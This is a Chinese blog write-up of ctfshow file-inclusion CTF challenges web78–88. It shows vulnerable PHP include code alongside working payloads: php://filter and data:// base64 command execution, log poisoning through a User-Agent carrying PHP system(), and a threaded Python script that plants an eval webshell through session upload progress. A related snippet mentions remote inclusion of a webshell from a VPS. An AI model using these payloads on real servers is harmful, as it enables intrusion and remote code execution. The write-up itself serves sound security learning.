ctfshow 文件包含

最新推荐文章于 2024-09-06 16:20:11 发布
最新推荐文章于 2024-09-06 16:20:11 发布
阅读量233 收藏
点赞数
分类专栏: CTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53755216/article/details/115696072
版权

说明

从零开始学 主要为了学知识

web78

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    include($file);
}else{
    highlight_file(__FILE__);
}

php伪协议读取

?file=php://filter/convert.base64-encode/resource=flag.php

php://filter 读取源代码并进行base64编码输出,不然会直接当做php代码执行就看不到源代码内容了

convert.* 转换过滤器
convert.base64-encode和 convert.base64-decode使用这两个过滤器等同于分别用 base64_encode()和 base64_decode()函数处理所有的流数据

拓展
XXE
php://filter

web79

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

直接调用hackbar LFI模块 很方便

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg==

web80,81

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

emm… 把php和data都ban了

日志包含配合UA头解决战斗

apache一般是/var/log/apache/access.log
nginx的log在/var/log/nginx/access.log和/var/log/nginx/error.log

?file=/var/log/nginx/access.log

按照计划 本该结束战斗 结果出了岔子

User-Agent: <?php system("ls"); ?>

貌似 " 读不出来? 。。。。。。

User-Agent: <?php system('ls'); ?>

就欧凯了。。。

web82

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

session.upload_progress相关文章

import requests
import io
import threading

url = "http://d60f9552-d734-4ad9-896b-afa360bb630c.challenge.ctf.show:8080/"
sessionID = "flag"
data = {"cmd": "system('cat fl0g.php');"}
def write(session):
    while True:
        f = io.BytesIO(b'a'*1024*50)
        resp = session.post(url=url,data={'PHP_SESSION_UPLOAD_PROGRESS':'<?php eval($_POST["cmd"]);?>'},files={'file':('flag.txt',f)},cookies={'PHPSESSID':sessionID})
def read(session):
    while True:
        resp = session.post(url='http://d60f9552-d734-4ad9-896b-afa360bb630c.challenge.ctf.show:8080/?file=/tmp/sess_flag',data=data)
        if 'flag.txt' in resp.text:
            print(resp.text)
            event.clear()
        else:
            print("=========retry==========")
if __name__ == "__main__":
    event = threading.Event()
    with requests.session() as session:
        for i in range(1,5):
            threading.Thread(target=write, args=(session,)).start()

        for i in range(1,5):
            threading.Thread(target=read, args=(session,)).start()
    event.set()

web84~86

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    system("rm -rf /tmp/*");
    include($file);
}else{
    highlight_file(__FILE__);
}

rm -rf /tmp/* 直接把 tmp下的文件都给删掉。emmm
貌似没什么用 还是跟82一样

82 - 86都可用一个脚本。。。

web87

php://filter 是一种设计用来允许过滤器程序在打开时成为流的封装协议。这对于单独具有完整功能的文件函数非常有用,否则就没有机会在读取内容之前将过滤器应用于流之上。

<?php

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $content = $_POST['content'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    file_put_contents(urldecode($file), "<?php die('大佬别秀了');?>".$content);

    
}else{
    highlight_file(__FILE__);
}

注意这里

urldecode($file)

file=php://filter/write=convert.base64-decode/resource=1.php

意思是对写入1.php的内容base64-decode
so

<?php die('大佬别秀了');?>就只剩下 phpdie

base64-deode相当于

$_GET['txt'] = preg_replace('|[^a-z0-9A-Z+/]|s', '', $_GET['txt']);
base64_decode($_GET['txt']);

base64算法解码时是4个byte一组 所以要加上两个东东

emmm 因为过滤了php 所以要全编码两次

web88

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    if(preg_match("/php|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\_|\+|\=|\./i", $file)){
        die("error");
    }
    include($file);
}else{
    highlight_file(__FILE__);
}

过滤了. 很重要 日志包含用不了啦
emmm 去掉 = 不影响

?file=data://text/plain;base64,PD89IHN5c3RlbSgnY2F0IGYqJyk7Pz4
b1ue0cean
关注
专栏目录
CTFshow 文件包含 web82
Kradress的博客
12-09 1290
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-16 19:34:45 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['file'])){
CTFshow 文件包含 web80
Kradress的博客
12-08 939
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-16 11:26:29 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['file'])){
CTFshow 文件包含
Je3Z的博客
06-03 461
web78 ?file=data://text/plain,<?php system("cat flag.php");?> web 79 ?file=data://text/plain,<?= system("cat flag*");?> web80 hao 方法一:远程文件包含 往VPS下面写马,然后远程包含: ?file=http://118.***.***.***/1.txt 方法二:日志文件包含 ?file=/var/log/nginx/access.log 因此往U
ctfshow-文件包含
最新发布
m0_72125469的博客
09-06 1203
结果是是这个原因 include包含的文件如果存在路径 他会按照指定路径查找文件 如果只存在文件名不存在路径 include首先会去定义的位置进行寻找文件 没有则在当前文件所在的目录和当前工作目录下寻找 所以不影响我们 线程5应该就可以了 不需要高并发导致的不确定行为 而是普通的和服务器删除速度来竞争 不是高并发的竞争。这里说一下 提交请求后的请求体是 不是想象的那种post 键值对的形式 而是表单的形式PHP_SESSION_UPLOAD_PROGRESS 也在表单中 这块的简单知识点 有时间得看看。
ctfshow——文件包含
qq_55202378的博客
02-03 968
这里不知道的文件路径,可以考虑使用尝试执行php语句,获取文件路径。 可能读取不了文件,这时候试试。linux 命令是倒序读取文件,也就是从最后一行往前读取文件。数据流封装器,以传递相应格式的数据。通常可以用来执行PHP代码。用法: 架设外网服务器,使用远程包含自己服务器上的后门文件,即可获取webshell。php伪协议总结: 首先,根据php特性,无法迭代过滤,只过滤一次。此处,如果用替换,可以直接使用双写进行绕过。 架设外网服务器,使用远程包含自己服务器上的后门文件,即可获取webshell。既
CTFSHOW—文件包含
灰太的表格的博客
02-04 632
web78 ?file=php://filter/convert.base64-encode/resource=flag.php web79 (php5.2.0起,数据流封装器开始有效,主要用于数据流的读取。如果传入的数据是PHP代码,就会执行代码 使用方法:data://text/plain;base64,xxxx(base64编码后的数据)) php被过滤使用data伪装协议执行代码 ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxh
CTFshow 文件包含 web116
Kradress的博客
12-12 848
目录源码思路题解总结 源码 下载视频用winhex分离出png 思路 可以正常读文件 题解 直接跑字典 总结 水题
CTFshow 文件包含 web87
Kradress的博客
12-12 1950
目录源码思路题解题解一题解二总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-16 21:57:55 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['file'])
CTFshow 文件包含 web79
Kradress的博客
12-07 704
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:10:14 # @Last Modified by: h1xa # @Last Modified time: 2020-09-16 11:12:38 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['file'])){
ctfshow文件包含
遇事不决冲冲冲
09-18 3382
web78 无防护读取源码 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 伪协议读取后base64解密 php://filter/read=convert.base64-encode/resource=flag.php web79 data协议 <?php if(isset($_GET['file
ctfshow_文件包含
qq_45951598的博客
03-27 363
文章目录WEB78web79 WEB78 没什么好讲的 payload:?file=php://filter/read=convert.base64-encode/resource=falg.php web79 if(isset($_GET['file'])){ $file = $_GET['file']; $file = str_replace("php", "???", $file); include($file); }else{ highlight_file(__F
CTFSHOW-文件包含
m0_74606212的博客
03-24 455
CTFSHOW-文件包含
CTFSHOW 文件包含
CyhDl666的博客
03-27 238
今天 复习一下文件包含漏洞 web 78 payload: ?file=php://filter/convert.base64-encode/resource=flag.php web 79 payload: ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs= web 80-81 这道题开始就有技巧了 源码 过滤了 php和data 伪协议用不了 if(isset($_GET['file'])){ .
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值